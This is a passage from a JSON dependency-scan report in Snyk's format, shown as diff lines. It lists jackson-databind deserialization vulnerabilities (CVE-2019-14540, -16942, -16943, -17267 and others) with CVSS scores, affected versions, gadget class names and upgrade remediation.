deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + 